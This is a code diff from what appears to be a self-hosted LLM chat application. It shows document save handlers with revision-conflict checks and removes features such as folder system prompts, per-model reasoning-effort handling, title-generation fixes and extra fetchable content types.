revision=_stamp(doc, doc.body or ""),
|
||||
writable=True,
|
||||
language="scratch.md",
|
||||
markdown=True,
|
||||
)
|
||||
|
||||
|
||||
# --- Saving --------------------------------------------------------------------------
|
||||
async def _save_agent(db: DBSession, user: User, chat: Chat, ref: str, text: str, revision: str):
|
||||
executor = _executor(db, user, chat)
|
||||
path = path_key(chat.project_dir, ref)
|
||||
try:
|
||||
await executor.write_text(path, text, if_unchanged=revision)
|
||||
except ExecError as exc:
|
||||
raise Refused(str(exc)) from exc
|
||||
|
||||
profile = agent_ready(db, user, chat)
|
||||
if profile is not None:
|
||||
# Unconditionally, unlike `file_edit` -- whose skip is an optimisation
|
||||
# for the model's hot path on the grounds that the file was already
|
||||
# there. The canvas can create one, and a listing known to be wrong is
|
||||
# what the cache note warns about.
|
||||
index_service.forget_dir(profile.id, chat.project_dir)
|
||||
if instructions_service.is_instruction_file(path, chat.project_dir):
|
||||
instructions_service.forget(profile.id, chat.project_dir)
|
||||
return await _load_agent(db, user, chat, path)
|
||||
|
||||
|
||||
async def _save_note(db: DBSession, user: User, chat: Chat, ref: str, text: str, revision: str):
|
||||
note = notes_service.get(db, ref, user)
|
||||
if note is None:
|
||||
raise Refused("That note is not there any more.")
|
||||
if not sharing.can_write(note, user):
|
||||
raise Refused("That note is not yours to change.")
|
||||
_check_stamp(note, note.body or "", revision)
|
||||
notes_service.update(db, note, body=text)
|
||||
return await _load_note(db, user, chat, ref)
|
||||
|
||||
|
||||
async def _save_skill(db: DBSession, user: User, chat: Chat, ref: str, text: str, revision: str):
|
||||
skill = skills_service.get(db, ref, user)
|
||||
if skill is None:
|
||||
raise Refused("That skill is not there any more.")
|
||||
if not sharing.can_write(skill, user):
|
||||
raise Refused("That skill is not yours to change.")
|
||||
_check_stamp(skill, skill.body or "", revision)
|
||||
# Snapshots into a SkillRevision first, which is why a skill needs no
|
||||
# conflict story beyond the token: a clobber is recoverable.
|
||||
skills_service.update(db, skill, body=text, note="Edited in the canvas")
|
||||
return await _load_skill(db, user, chat, ref)
|
||||
|
||||
|
||||
async def _save_doc(db: DBSession, user: User, chat: Chat, ref: str, text: str, revision: str):
|
||||
document = documents_service.get(db, ref, user)
|
||||
if document is None:
|
||||
raise Refused("That document is not there any more.")
|
||||
if not documents_service.can_write(document, user):
|
||||
raise Refused("That document is not yours to change.")
|
||||
_check_stamp(document, document.extracted_text or "", revision)
|
||||
documents_service.set_text(db, document, text)
|
||||
return await _load_doc(db, user, chat, ref)
|
||||
|
||||
|
||||
async def _save_scratch(db: DBSession, user: User, chat: Chat, ref: str, text: str, revision: str):
|
||||
if ref != chat.id:
|
||||
raise Refused("That scratch document belongs to another chat.")
|
||||
doc = scratch_service.for_chat(db, chat)
|
||||
_check_stamp(doc, doc.body or "", revision)
|
||||
scratch_service.update(db, doc, body=text)
|
||||
return await _load_scratch(db, user, chat, ref)
|
||||
|
||||
|
||||
# --- One table -------------------------------------------------------------------------
|
||||
_SOURCES: dict[str, tuple] = {
|
||||
SOURCE_AGENT: (_load_agent, _save_agent),
|
||||
SOURCE_NOTE: (_load_note, _save_note),
|
||||
SOURCE_SKILL: (_load_skill, _save_skill),
|
||||
SOURCE_DOC: (_load_doc, _save_doc),
|
||||
SOURCE_FILE: (_load_file, None),
|
||||
SOURCE_SCRATCH: (_load_scratch, _save_scratch),
|
||||
}
|
||||
|
||||
|
||||
async def load(db: DBSession, user: User, chat: Chat, key: str) -> Doc:
|
||||
source, ref = split(key)
|
||||
entry = _SOURCES.get(source)
|
||||
if entry is None or not ref:
|
||||
raise Refused("There is nothing to open here.")
|
||||
return await entry[0](db, user, chat, ref)
|
||||
|
||||
|
||||
async def save(
|
||||
db: DBSession, user: User, chat: Chat, key: str, text: str, revision: str = ""
|
||||
) -> Doc:
|
||||
source, ref = split(key)
|
||||
entry = _SOURCES.get(source)
|
||||
if entry is None or not ref:
|
||||
raise Refused("There is nothing to save here.")
|
||||
saver = entry[1]
|
||||
if saver is None:
|
||||
raise Refused("This one can only be read.")
|
||||
return await saver(db, user, chat, ref, text, revision)
|
||||
|
||||
|
||||
# --- Small shared pieces ------------------------------------------------------------------
|
||||
def _needs_library(db: DBSession, user: User) -> None:
|
||||
if not permissions.has(db, user, "library.use"):
|
||||
raise Refused("You do not have access to the library.")
|
||||
|
||||
|
||||
def _stamp(row, text: str) -> str:
|
||||
"""A revision token for a database row.
|
||||
|
||||
`updated_at` alone would not move for two saves inside one clock tick, so
|
||||
the length rides along -- the same pairing the file token uses, and for the
|
||||
same reason. The text is passed in rather than guessed at: a note keeps it
|
||||
in `body` and a document in `extracted_text`, and a getattr chain that
|
||||
silently found neither would hand every row the same token.
|
||||
"""
|
||||
when = getattr(row, "updated_at", None)
|
||||
if when is not None and when.tzinfo is None:
|
||||
# SQLite does not store the offset, so a row loaded from disk comes back
|
||||
# naive while one still in the session's identity map keeps the tzinfo
|
||||
# it was created with -- and `.timestamp()` reads a naive value as local
|
||||
# time. Without this the same row yields two different tokens depending
|
||||
# on where it was loaded, and every save outside UTC would report a
|
||||
# conflict that is not there. The same normalisation
|
||||
# `compaction.moment` makes, for the same reason.
|
||||
when = when.replace(tzinfo=UTC)
|
||||
return revision_of(int(when.timestamp()) if when else 0, len(text or ""))
|
||||
|
||||
|
||||
def _check_stamp(row, text: str, revision: str) -> None:
|
||||
"""Refuse a save whose token no longer matches. An empty token overwrites.
|
||||
|
||||
Empty is what Overwrite on the conflict card sends: somebody has been shown
|
||||
both versions and chosen. Never save silently over a change; never discard
|
||||
silently either.
|
||||
"""
|
||||
if revision and _stamp(row, text) != revision:
|
||||
raise Conflict(_stamp(row, text))
|
||||
+19
-328
@@ -3,7 +3,6 @@
|
||||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
import re
|
||||
from datetime import UTC, datetime, timedelta
|
||||
from typing import Any
|
||||
|
||||
@@ -11,7 +10,6 @@ from sqlalchemy import func, select
|
||||
from sqlalchemy.orm import Session as DBSession
|
||||
|
||||
from lembas.db.models import (
|
||||
KIND_MESSAGES,
|
||||
ROLE_ASSISTANT,
|
||||
ROLE_SYSTEM,
|
||||
ROLE_USER,
|
||||
@@ -35,13 +33,6 @@ FORWARDED_PARAMS = frozenset(
|
||||
|
||||
MAX_TITLE_LENGTH = 60
|
||||
|
||||
# What one title call may spend. A title is a handful of words; the rest of this
|
||||
# is headroom for a model that thinks before it answers, which is most of the
|
||||
# interesting local ones. Too small is not a shorter title -- it is no title at
|
||||
# all, because the thinking consumes the budget and the content field comes back
|
||||
# empty or holding an unclosed `<think>`.
|
||||
TITLE_MAX_TOKENS = 512
|
||||
|
||||
# How long a temporary chat survives after the last thing said in it.
|
||||
TEMPORARY_LIFETIME = timedelta(hours=24)
|
||||
|
||||
@@ -137,16 +128,7 @@ def message_payload(message: Message, *, vision: bool) -> dict[str, Any]:
|
||||
# in view, which is how these models are trained to read a prompt.
|
||||
text = f"{documents}\n\n{text}" if text else documents
|
||||
|
||||
# Images ride on a *user* turn and nowhere else. Until image generation
|
||||
# existed no assistant message had ever carried one, so this was never a
|
||||
# distinction worth drawing -- and the moment one does, the multimodal list
|
||||
# form on an `assistant` turn is rejected outright by OpenAI and by most
|
||||
# local runners, which would break not that turn but every later one in the
|
||||
# chat. What follows from it, and is worth knowing rather than discovering:
|
||||
# a model cannot see the picture it made on a *subsequent* turn (tool
|
||||
# results are not replayed either), so "make it bluer" regenerates rather
|
||||
# than edits. Honest for a text-to-image workflow with no img2img path.
|
||||
images = message.images if (vision and message.role == ROLE_USER) else []
|
||||
images = message.images if vision else []
|
||||
if not images:
|
||||
return {"role": message.role, "content": text}
|
||||
|
||||
@@ -167,53 +149,23 @@ def message_payload(message: Message, *, vision: bool) -> dict[str, Any]:
|
||||
return {"role": message.role, "content": parts}
|
||||
|
||||
|
||||
def folder_system_prompt(db: DBSession, chat: Chat) -> str:
|
||||
"""The nearest prompt on the chat's folder, or on a folder above it.
|
||||
|
||||
Walks up rather than reading one level, because folders nest and a project's
|
||||
prompt belongs on the project rather than on each sub-folder of it. The
|
||||
nearest one wins, which is the same rule the ladder as a whole follows.
|
||||
|
||||
Bounded and cycle-safe the way `api/folders.py:_depth_of` is. Reparenting
|
||||
already refuses to build a cycle, but this runs on the request path for
|
||||
every reply and a row written by something else must not be able to hang it.
|
||||
"""
|
||||
from lembas.db.models import Folder
|
||||
|
||||
folder = chat.folder
|
||||
seen: set[str] = set()
|
||||
while folder is not None and folder.id not in seen:
|
||||
seen.add(folder.id)
|
||||
if (folder.system_prompt or "").strip():
|
||||
return folder.system_prompt.strip()
|
||||
folder = db.get(Folder, folder.parent_id) if folder.parent_id else None
|
||||
return ""
|
||||
|
||||
|
||||
def effective_system_prompt(db: DBSession, chat: Chat) -> str:
|
||||
"""The system prompt a chat actually runs with.
|
||||
|
||||
Four layers, most specific wins outright:
|
||||
Three layers, most specific wins outright:
|
||||
|
||||
chat > folder > model > instance
|
||||
chat > model > instance
|
||||
|
||||
Precedence rather than concatenation. Stacking them reads well in a
|
||||
settings screen and badly in practice: the moment two layers disagree the
|
||||
model gets contradictory instructions and nobody can tell which one is
|
||||
losing. With precedence, "why is it behaving like this" has one answer.
|
||||
|
||||
The folder sits above the model because it is the more specific statement:
|
||||
a model's prompt describes the model wherever it is used, and a folder's
|
||||
describes this piece of work whichever model is pointed at it.
|
||||
"""
|
||||
from lembas.services import settings_store
|
||||
|
||||
if chat.system_prompt.strip():
|
||||
return chat.system_prompt.strip()
|
||||
|
||||
if inherited := folder_system_prompt(db, chat):
|
||||
return inherited
|
||||
|
||||
model = db.scalar(
|
||||
select(Model).where(Model.model_id == chat.model_id).order_by(Model.position)
|
||||
)
|
||||
@@ -267,21 +219,6 @@ def build_messages(
|
||||
select(Message).where(Message.chat_id == chat.id).order_by(Message.created_at)
|
||||
).all()
|
||||
|
||||
# The Messages conversation never ends, so it cannot all be sent. Only the
|
||||
# most recent turns go; everything before them stays on screen and out of
|
||||
# the request. One branch, and the bound is applied before the loop rather
|
||||
# than inside it so the filters below still see a contiguous tail.
|
||||
#
|
||||
# Not compaction: that summarises with a model call and a threshold, on a
|
||||
# conversation somebody decided to shorten. This is mechanical, lossless and
|
||||
# permanent, which is why `compaction.should_compact` refuses this kind --
|
||||
# two mechanisms fighting over one transcript is how you get a summary of a
|
||||
# summary.
|
||||
if chat.kind == KIND_MESSAGES:
|
||||
from lembas.services import messages as messages_service
|
||||
|
||||
history = history[-messages_service.LIVE_CHUNK :]
|
||||
|
||||
for message in history:
|
||||
if upto is not None and message.id == upto.id:
|
||||
break
|
||||
@@ -330,7 +267,6 @@ def build_request(
|
||||
upto: Message | None = None,
|
||||
tools: list[dict[str, Any]] | None = None,
|
||||
user=None,
|
||||
force_tool: str = "",
|
||||
) -> dict[str, Any]:
|
||||
"""The whole request body, tools and harness included.
|
||||
|
||||
@@ -374,29 +310,8 @@ def build_request(
|
||||
}
|
||||
if tools:
|
||||
body["tools"] = tools
|
||||
# Making the model call one particular tool, for `/image` -- the whole
|
||||
# of what that command is. Only ever sent alongside a tools array and
|
||||
# only when something asked for it, so a provider strict about unknown
|
||||
# parameters sees exactly the request it always did until somebody types
|
||||
# a slash command.
|
||||
#
|
||||
# An endpoint that ignores `tool_choice` is not a failure here: the turn
|
||||
# still carries the instruction in words, so the model is being steered
|
||||
# twice and the weaker half is the one that can be dropped.
|
||||
if force_tool and any(
|
||||
(tool.get("function") or {}).get("name") == force_tool for tool in tools
|
||||
):
|
||||
body["tool_choice"] = {"type": "function", "function": {"name": force_tool}}
|
||||
|
||||
# The model's own vocabulary, looked up here rather than passed in: every
|
||||
# caller of `build_request` would otherwise have to remember, which is the
|
||||
# trap `audio_service.template_flags` fell into.
|
||||
chat_model = model_for(db, chat)
|
||||
apply_effort(
|
||||
body,
|
||||
(chat.params_json or {}).get("reasoning_effort"),
|
||||
efforts_for(chat_model) if chat_model is not None else None,
|
||||
)
|
||||
apply_effort(body, (chat.params_json or {}).get("reasoning_effort"))
|
||||
return body
|
||||
|
||||
|
||||
@@ -414,136 +329,12 @@ def build_request(
|
||||
# an effort on sends neither field and is byte-for-byte what it was. An endpoint
|
||||
# strict about unknown parameters will refuse the extra one -- but on a chat
|
||||
# somebody deliberately set an effort on, not on every chat in the instance.
|
||||
# Every reasoning effort this application understands, and the subset a model
|
||||
# gets when nobody has said otherwise.
|
||||
#
|
||||
# 🚨 These are two different questions and conflating them is what broke a
|
||||
# chat on Bonsai: `EFFORTS` was `("low", "medium", "high")` and was used both to
|
||||
# validate what somebody chose *and* to decide what to offer, so a model whose
|
||||
# vocabulary is low/medium/**xhigh** could not be given its own top setting,
|
||||
# and the one it was given -- `high` -- made its chat template call
|
||||
# `raise_exception` and took the whole reply with it.
|
||||
#
|
||||
# The known list is the union across providers, which have not agreed: OpenAI
|
||||
# has added `minimal`, `xhigh` and `max` at different points; gpt-oss takes
|
||||
# low/medium/high; Bonsai takes low/medium/xhigh and refuses high. `none` is
|
||||
# deliberately absent -- this application already spells that `off`, and two
|
||||
# spellings of off is the failure this codebase keeps cataloguing.
|
||||
EFFORTS = ("minimal", "low", "medium", "high", "xhigh", "max")
|
||||
|
||||
# What a model is offered when its own list is empty. The three every reasoning
|
||||
# model since the first one has understood.
|
||||
DEFAULT_EFFORTS = ("low", "medium", "high")
|
||||
EFFORTS = ("low", "medium", "high")
|
||||
|
||||
|
||||
def efforts_for(model) -> tuple[str, ...]:
|
||||
"""The efforts this model accepts, in the order they should be offered.
|
||||
|
||||
A model's own list when an administrator has set one or the endpoint has
|
||||
taught us one (see `generation._narrow_efforts`), and the common three
|
||||
otherwise. Filtered against `EFFORTS` on the way out, so a value stored by
|
||||
an older release -- or learned from an endpoint that advertised something
|
||||
this application has never heard of -- cannot reach a request body.
|
||||
"""
|
||||
stored = list(getattr(model, "reasoning_efforts", None) or [])
|
||||
chosen = [value for value in stored if value in EFFORTS]
|
||||
if not chosen:
|
||||
return DEFAULT_EFFORTS
|
||||
return tuple(value for value in EFFORTS if value in chosen)
|
||||
|
||||
|
||||
def resolved_effort(chat) -> str:
|
||||
"""The effort this chat will actually send, or "" for none.
|
||||
|
||||
Its own value, and nothing else. The model's default is a **seed** applied
|
||||
when the chat is created (`api/chats.py:_new_chat`) and on a model change,
|
||||
and is deliberately not consulted here for two reasons. A chat's request
|
||||
should be a function of the chat row alone -- the same rule that has PDF
|
||||
text extracted once at upload and knowledge attachments copied. And a
|
||||
fallback would break "off": `update_chat` stores `None` for a cleared
|
||||
effort, a fallback would resurrect the model's default underneath it, and
|
||||
the off option would silently do nothing.
|
||||
|
||||
The picker shows exactly this, which is the whole point of it existing:
|
||||
"Effort: default" named no level and was true of nothing in particular.
|
||||
"""
|
||||
value = (getattr(chat, "params_json", None) or {}).get("reasoning_effort")
|
||||
return value if value in EFFORTS else ""
|
||||
|
||||
|
||||
def efforts_from_chat_template(template: str) -> list[str]:
|
||||
"""Which efforts a model's Jinja chat template will actually accept.
|
||||
|
||||
The template is where the truth lives: the one on a Bonsai reads roughly
|
||||
|
||||
{%- if reasoning_effort not in ('xhigh', 'medium', 'low') %}
|
||||
{{- raise_exception('Unexpected reasoning effort ' ~ reasoning_effort ...
|
||||
|
||||
so the accepted set is written out beside the thing that rejects everything
|
||||
else. `llama-server` hands the whole template over on `/props`, which makes
|
||||
this readable rather than guessable.
|
||||
|
||||
Deliberately conservative, because a wrong answer here silently removes a
|
||||
level somebody is entitled to:
|
||||
|
||||
- only quoted literals within a short window of a `reasoning_effort`
|
||||
mention are considered, so an unrelated list elsewhere in a four-hundred
|
||||
line template cannot contribute;
|
||||
- the result is intersected with `EFFORTS`, so an unknown token is dropped
|
||||
rather than stored;
|
||||
- fewer than two survivors is treated as "the template did not say". One
|
||||
match is far more likely to be a default assignment
|
||||
(`{%- set reasoning_effort = 'medium' %}`) than a vocabulary.
|
||||
|
||||
Returns [] when nothing can be read, which every caller treats as "ask
|
||||
somebody" rather than as "this model accepts nothing".
|
||||
"""
|
||||
if not template or "reasoning_effort" not in template:
|
||||
return []
|
||||
|
||||
found: set[str] = set()
|
||||
|
||||
# Shape one: the values sit in the statement that tests them.
|
||||
# {%- if reasoning_effort not in ('xhigh', 'medium', 'low') %}
|
||||
for match in re.finditer(r"reasoning_effort", template):
|
||||
window = template[match.start() : match.start() + 400]
|
||||
# Stop at the end of the statement that mentions it, so a later,
|
||||
# unrelated block cannot leak in.
|
||||
window = window.split("%}")[0] if "%}" in window else window
|
||||
for literal in re.findall(r"""['"]([a-z]{3,8})['"]""", window):
|
||||
if literal in EFFORTS:
|
||||
found.add(literal)
|
||||
|
||||
# Shape two: the values are a named list somewhere else, and the test says
|
||||
# {%- if reasoning_effort not in valid_efforts %}
|
||||
# so nothing near the mention names them. Any group of quoted literals in
|
||||
# which *every* token is a known effort and there are at least two is taken
|
||||
# -- that is a strong enough signal on its own, and a list of nothing but
|
||||
# effort names that is not the effort vocabulary would be a strange thing
|
||||
# for a chat template to contain.
|
||||
for group in re.findall(r"[\[(]((?:\s*['\"][a-z]{3,8}['\"]\s*,?)+)[\])]", template):
|
||||
literals = re.findall(r"""['"]([a-z]{3,8})['"]""", group)
|
||||
if len(literals) >= 2 and all(value in EFFORTS for value in literals):
|
||||
found.update(literals)
|
||||
|
||||
if len(found) < 2:
|
||||
return []
|
||||
return [effort for effort in EFFORTS if effort in found]
|
||||
|
||||
|
||||
def apply_effort(
|
||||
body: dict[str, Any], effort: str | None, supported: tuple[str, ...] | None = None
|
||||
) -> None:
|
||||
"""Put a chosen reasoning effort into a request body, in both forms.
|
||||
|
||||
`supported` is the model's own vocabulary. An effort outside it is dropped
|
||||
rather than sent, because the second form below is not advisory: it reaches
|
||||
the model's Jinja chat template, and a template that does not know the value
|
||||
raises rather than ignoring it -- which fails the whole request, not the
|
||||
parameter.
|
||||
"""
|
||||
allowed = supported or DEFAULT_EFFORTS
|
||||
if not effort or effort not in allowed:
|
||||
def apply_effort(body: dict[str, Any], effort: str | None) -> None:
|
||||
"""Put a chosen reasoning effort into a request body, in both forms."""
|
||||
if not effort or effort not in EFFORTS:
|
||||
return
|
||||
body["reasoning_effort"] = effort
|
||||
kwargs = dict(body.get("chat_template_kwargs") or {})
|
||||
@@ -595,54 +386,6 @@ def available_models(db: DBSession, user=None) -> list[Model]:
|
||||
return sorted(reachable, key=lambda m: (m.position, m.model_id))
|
||||
|
||||
|
||||
# How much of the roster one request will carry. Every model an instance has
|
||||
# multiplies this, and the harness has a budget the whole of it shares
|
||||
# (`MAX_HARNESS_CHARS`, and `tests/test_harness.py` fails if the shipped
|
||||
# defaults grow past the margin) -- so a hundred-model instance has to be
|
||||
# bounded here rather than found out about later.
|
||||
MAX_ROSTER_MODELS = 24
|
||||
MAX_ROSTER_CHARS = 2400
|
||||
# Per model, so one very long note cannot crowd out the rest of the list.
|
||||
MAX_ROSTER_ENTRY = 300
|
||||
|
||||
|
||||
def roster_models(db: DBSession, user=None, *, exclude: str = "") -> list[Model]:
|
||||
"""The other models this person could reach, in the administrator's order.
|
||||
|
||||
`exclude` is a `model_id` and is normally the chat's own: a model does not
|
||||
need telling that it exists. Resolved through `available_models`, so a model
|
||||
restricted to a group nobody here belongs to is not named -- listing one
|
||||
would be both a leak and a dead end, since asking it anything is refused by
|
||||
the same check.
|
||||
"""
|
||||
return [model for model in available_models(db, user) if model.model_id != exclude]
|
||||
|
||||
|
||||
def roster_block(db: DBSession, user=None, *, exclude: str = "") -> str:
|
||||
"""The roster as the models read it: one line each, name, id, what it is for.
|
||||
|
||||
The id is in brackets because it is what has to be typed back into
|
||||
`ask_friend`, and the label alone is not unique enough to be an argument.
|
||||
`notes` follows the description rather than replacing it -- the description
|
||||
says what it is for and the notes say what it is, and a model choosing whom
|
||||
to ask wants both.
|
||||
"""
|
||||
lines: list[str] = []
|
||||
budget = MAX_ROSTER_CHARS
|
||||
for model in roster_models(db, user, exclude=exclude)[:MAX_ROSTER_MODELS]:
|
||||
parts = ((model.description or "").strip(), (model.notes or "").strip())
|
||||
about = " ".join(part for part in parts if part)
|
||||
about = " ".join(about.split())[:MAX_ROSTER_ENTRY]
|
||||
line = f"- {model.label} ({model.model_id})"
|
||||
if about:
|
||||
line = f"{line} — {about}"
|
||||
if len(line) > budget:
|
||||
break
|
||||
budget -= len(line)
|
||||
lines.append(line)
|
||||
return "\n".join(lines)
|
||||
|
||||
|
||||
def fallback_title(text: str) -> str:
|
||||
"""Derive a chat title from the opening message, without calling a model."""
|
||||
cleaned = " ".join(text.split())
|
||||
@@ -676,45 +419,24 @@ async def generate_title(
|
||||
if not template.strip():
|
||||
return fallback_title(question)
|
||||
|
||||
from lembas.services.reasoning import strip_reasoning
|
||||
|
||||
prompt = prompts_service.substitute(
|
||||
template, {"question": question[:500], "answer": answer[:500]}
|
||||
)
|
||||
body = {
|
||||
try:
|
||||
raw = await complete(
|
||||
endpoint,
|
||||
{
|
||||
"model": model_id,
|
||||
"messages": [{"role": ROLE_USER, "content": prompt}],
|
||||
# Enough that a model which thinks before answering can do both. It was
|
||||
# 24, which is ample for six words and nowhere near enough for a
|
||||
# reasoning model: the whole budget went on thinking and the reply came
|
||||
# back either empty or as an unclosed `<think>`, so every chat on such a
|
||||
# model silently fell back to its first prompt and looked as though
|
||||
# titling had never run.
|
||||
"max_tokens": TITLE_MAX_TOKENS,
|
||||
"max_tokens": 24,
|
||||
"temperature": 0.2,
|
||||
}
|
||||
# Deliberately *not* `apply_effort(body, "low")`, tempting as it is: naming
|
||||
# a chat does not reward deliberation and a low effort would make this call
|
||||
# much cheaper. But `reasoning_effort` and `chat_template_kwargs` appear
|
||||
# only when somebody has opted in, precisely so a provider strict about
|
||||
# unknown parameters sees exactly the request it always did — and sending
|
||||
# them here would put them on every instance's title call, where a 400 is
|
||||
# caught and turned into a fallback title. That is titling silently
|
||||
# switching itself off, which is the failure this whole change is fixing.
|
||||
# The token budget above is what makes room for the thinking instead.
|
||||
try:
|
||||
raw = await complete(endpoint, body)
|
||||
},
|
||||
)
|
||||
except LLMError as exc:
|
||||
log.debug("auto-title failed, using fallback: %s", exc)
|
||||
return fallback_title(question)
|
||||
|
||||
# `complete` hands back `message.content` as it arrived. A model that emits
|
||||
# `<think>` tags inline puts them in exactly that field, so without this the
|
||||
# title was "<think>Okay, the user wants a short title for". Reasoning sent
|
||||
# in a separate `reasoning_content` field is ignored by `complete` already.
|
||||
answered, _thinking = strip_reasoning(raw)
|
||||
|
||||
title = " ".join(answered.split()).strip().strip('"“”\'')
|
||||
title = " ".join(raw.split()).strip().strip('"“”\'')
|
||||
# Small models sometimes ignore the instruction and answer the question
|
||||
# instead; an over-long reply is a better signal of that than anything else.
|
||||
if not title or len(title) > MAX_TITLE_LENGTH * 1.5:
|
||||
@@ -731,7 +453,6 @@ def create_message(
|
||||
complete_: bool = True,
|
||||
model_id: str = "",
|
||||
queued: bool = False,
|
||||
machine: bool = False,
|
||||
) -> Message:
|
||||
message = Message(
|
||||
chat_id=chat.id,
|
||||
@@ -740,7 +461,6 @@ def create_message(
|
||||
complete=complete_,
|
||||
model_id=model_id,
|
||||
queued=queued,
|
||||
machine=machine,
|
||||
)
|
||||
db.add(message)
|
||||
db.commit()
|
||||
@@ -783,37 +503,6 @@ async def summarise_for_compaction(
|
||||
return raw.strip()
|
||||
|
||||
|
||||
def delete_chats(db: DBSession, chats) -> int:
|
||||
"""Delete chats, and the files their attachments point at.
|
||||
|
||||
**The one way to delete a chat.** `db.delete(chat)` cascades to its messages
|
||||
and to its attachment *rows*, and leaves every file on disk -- a generated
|
||||
image, an uploaded PDF, a photo -- with nothing that will ever look at them
|
||||
again: `sweep_orphans` only considers uploads that were never attached.
|
||||
|
||||
`files_service.remove_files_for_chats` was written for exactly this and was
|
||||
called from one place, the temporary sweep. The delete button, a schedule's
|
||||
task chat, a helper's hidden chat and deleting an account all went straight
|
||||
to `db.delete`, so four of the five ways a chat can end leaked its files.
|
||||
That is `sharing.forget_principal` again: a helper that exists, is correct,
|
||||
and is not called on the path that needs it.
|
||||
|
||||
The order matters and is why this is a function rather than a note. The
|
||||
files have to be unlinked **while the rows still say which they are**, so it
|
||||
happens before the delete and in the same session.
|
||||
|
||||
Does not commit -- the caller decides, because some of them are deleting
|
||||
other things in the same transaction.
|
||||
"""
|
||||
live = [chat for chat in chats if chat is not None]
|
||||
if not live:
|
||||
return 0
|
||||
files_service.remove_files_for_chats(db, [chat.id for chat in live])
|
||||
for chat in live:
|
||||
db.delete(chat)
|
||||
return len(live)
|
||||
|
||||
|
||||
def sweep_temporary(db: DBSession, older_than: timedelta = TEMPORARY_LIFETIME) -> int:
|
||||
"""Delete temporary chats nobody has touched for a day.
|
||||
|
||||
@@ -845,7 +534,9 @@ def sweep_temporary(db: DBSession, older_than: timedelta = TEMPORARY_LIFETIME) -
|
||||
if not stale:
|
||||
return 0
|
||||
|
||||
delete_chats(db, stale)
|
||||
files_service.remove_files_for_chats(db, [chat.id for chat in stale])
|
||||
for chat in stale:
|
||||
db.delete(chat)
|
||||
db.commit()
|
||||
log.info("swept %d temporary chat(s)", len(stale))
|
||||
return len(stale)
|
||||
|
||||
@@ -25,7 +25,7 @@ from datetime import UTC, datetime
|
||||
from sqlalchemy import select
|
||||
from sqlalchemy.orm import Session as DBSession
|
||||
|
||||
from lembas.db.models import KIND_MESSAGES, ROLE_ASSISTANT, Chat, Message
|
||||
from lembas.db.models import ROLE_ASSISTANT, Chat, Message
|
||||
from lembas.services import metrics as metrics_service
|
||||
from lembas.services import settings_store, tokens
|
||||
|
||||
@@ -187,14 +187,6 @@ def should_compact(db: DBSession, chat: Chat, *, pending: str = "") -> bool:
|
||||
if limit <= 0:
|
||||
return False
|
||||
|
||||
# The Messages conversation bounds its own request mechanically, in
|
||||
# `build_messages`. Two mechanisms narrowing one transcript is how a summary
|
||||
# ends up summarising a summary -- and this one would be summarising turns
|
||||
# that are already outside the request, which achieves nothing at the cost
|
||||
# of a model call and a divider on a page that has no divider.
|
||||
if chat.kind == KIND_MESSAGES:
|
||||
return False
|
||||
|
||||
last = last_complete(db, chat)
|
||||
if last is None:
|
||||
return False
|
||||
|
||||
@@ -47,27 +47,6 @@ _DROPPED = re.compile(
|
||||
re.IGNORECASE | re.DOTALL,
|
||||
)
|
||||
_TITLE = re.compile(r"<title[^>]*>(.*?)</title>", re.IGNORECASE | re.DOTALL)
|
||||
|
||||
# Content types that are text but are not spelled `text/*`. The sniff below was
|
||||
# written for "save this page into my library" and refused every one of them,
|
||||
# which meant every JSON API there is -- wrong for the link-attach path already,
|
||||
# and unusable once a model can ask for a URL itself. Widened by exactly this
|
||||
# list plus the `+json` / `+xml` suffixes, and no further: images, PDFs and
|
||||
# application/octet-stream still raise, because handing a model five megabytes
|
||||
# of binary is the thing the refusal was for.
|
||||
_TEXTUAL = frozenset(
|
||||
{
|
||||
"application/json",
|
||||
"application/xml",
|
||||
"application/xhtml+xml",
|
||||
"application/javascript",
|
||||
"application/x-ndjson",
|
||||
"application/yaml",
|
||||
"application/x-yaml",
|
||||
"application/toml",
|
||||
"application/sql",
|
||||
}
|
||||
)
|
||||
# Tags that end a line of prose. Turning them into newlines before the tags are
|
||||
# stripped is the difference between readable text and one enormous paragraph.
|
||||
_BREAKS = re.compile(
|
||||
@@ -214,15 +193,9 @@ async def fetch(url: str, *, allow_private: bool = False) -> Fetched:
|
||||
payload = response.content[:MAX_PAGE_BYTES]
|
||||
content_type = response.headers.get("content-type", "")
|
||||
|
||||
bare = content_type.split(";")[0].strip().lower()
|
||||
if "html" in content_type or payload[:512].lstrip()[:1] == b"<":
|
||||
title, text = html_to_text(payload.decode(response.encoding or "utf-8", "replace"))
|
||||
elif (
|
||||
content_type.startswith("text/")
|
||||
or not content_type
|
||||
or bare in _TEXTUAL
|
||||
or bare.endswith(("+json", "+xml"))
|
||||
):
|
||||
elif content_type.startswith("text/") or not content_type:
|
||||
title, text = "", payload.decode(response.encoding or "utf-8", "replace")
|
||||
else:
|
||||
raise FetchError(
|
||||
|
||||
+21
-237
@@ -29,21 +29,11 @@ from sqlalchemy import select
|
||||
from sqlalchemy.orm import Session as DBSession
|
||||
|
||||
from lembas.config import settings
|
||||
from lembas.db.models import KIND_DOCUMENT, KIND_IMAGE, KIND_TEXT, Attachment, Message
|
||||
from lembas.db.models import KIND_DOCUMENT, KIND_IMAGE, KIND_TEXT, Attachment
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
# --- Limits ------------------------------------------------------------------
|
||||
# These are the *defaults*, and an administrator can move every one of them on
|
||||
# /admin/extraction. They stay here because a default belongs beside the code
|
||||
# that depends on it, and because `prepare` is called from places with no
|
||||
# database session at all.
|
||||
#
|
||||
# The values are read through `limits()`, a process-level snapshot with the same
|
||||
# shape and the same reasoning as `services/branding.py`: one query per process,
|
||||
# dropped when the page saves. Threading a session through `prepare`,
|
||||
# `_process_image`, `_process_pdf` and `_process_text` would have meant six
|
||||
# signatures changed to carry a number.
|
||||
MAX_UPLOAD_BYTES = 20 * 1024 * 1024
|
||||
|
||||
# Longest edge after downscaling. Large enough for a model to read a screenshot
|
||||
@@ -53,9 +43,6 @@ JPEG_QUALITY = 85
|
||||
|
||||
# Pillow's own guard against decompression bombs: a 60,000x60,000 PNG is a few
|
||||
# KB on disk and hundreds of GB decoded.
|
||||
#
|
||||
# Deliberately NOT a setting. It is a guard, not a preference, and nothing good
|
||||
# comes of being able to raise it from a form.
|
||||
Image.MAX_IMAGE_PIXELS = 64_000_000
|
||||
|
||||
MAX_PDF_PAGES = 300
|
||||
@@ -90,84 +77,6 @@ TEXT_EXTENSIONS = {
|
||||
}
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
class Limits:
|
||||
